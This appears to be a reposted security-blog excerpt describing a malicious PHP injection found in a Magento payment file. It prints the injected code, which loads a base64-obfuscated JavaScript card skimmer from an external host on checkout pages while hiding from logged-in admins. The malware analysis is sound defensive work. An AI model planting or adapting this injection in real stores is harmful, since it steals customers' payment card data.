Global CyberSecurity

Magento PHP Injection Loads JavaScript Skimmer

0

Published on 01/21/2021 – Last Updated on 01/21/2021 by OTC

A Magento website owner was concerned about malware and reached out to our team for assistance. Upon investigation, we found the website contained a PHP injection in one of the Magento files: ./app/code/core/Mage/Payment/Model/Method/Cc.php


if ($_SERVER[“REQUEST_METHOD”] === “GET”){
if (strpos($_SERVER[“REQUEST_URI”], “/onestepcheckout/index/”) !== false){
if(!isset($_COOKIE[“adminhtml”])){
echo file_get_contents(base64_decode(“aHR0cHM6Ly91bmRlcnNjb3JlZndbLl1jb20vc3JjL2tyZWEuanM=”));
}
}
}

To make it more difficult to detect, the JavaScript skimmer is loaded using the PHP function file_get_contents and the URL obfuscated with base64.

Continue reading Magento PHP Injection Loads JavaScript Skimmer at Sucuri Blog.

Pakistan sends replenishment oiler to Africa for humanitarian aid

Previous article

Bringing a knife to a gunfight โ€“ are European Navies underarmed for peer to peer conflict and power projection?

Next article

You may also like

Comments

Comments are closed.